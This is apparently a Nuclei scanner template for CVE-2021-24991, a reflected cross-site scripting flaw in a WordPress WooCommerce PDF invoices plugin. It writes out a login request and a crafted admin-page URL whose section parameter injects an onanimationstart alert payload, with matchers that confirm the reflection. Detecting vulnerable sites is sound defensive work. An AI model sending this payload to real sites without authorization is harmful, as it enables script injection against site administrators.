58 lines
2.5 KiB
YAML
58 lines
2.5 KiB
YAML
id: CVE-2021-24991
|
|
|
|
info:
|
|
name: WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting
|
|
author: cckuailong
|
|
severity: medium
|
|
description: The Wordpress plugin WooCommerce PDF Invoices & Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
|
|
remediation: |
|
|
Update to the latest version of the WooCommerce PDF Invoices & Packing Slips WordPress Plugin (2.10.5 or higher) to mitigate the vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24991
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 4.8
|
|
cve-id: CVE-2021-24991
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00069
|
|
epss-percentile: 0.28508
|
|
cpe: cpe:2.3:a:wpovernight:woocommerce_pdf_invoices\&_packing_slips:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: wpovernight
|
|
product: woocommerce_pdf_invoices\&_packing_slips
|
|
framework: wordpress
|
|
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan,wpovernight
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{RootURL}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
|
- |
|
|
GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
|
|
- "WooCommerce PDF Invoices"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502201850c1610a357f9b60f94e7ac8dd443ef8ec9c463feb5f93e55562af4532f2a2022100bdef440e5e37f5986e007ef6aa56d500db63a782949ff95bc0108f5c2e130517:922c64590222798bb761d5b6d8e72950 |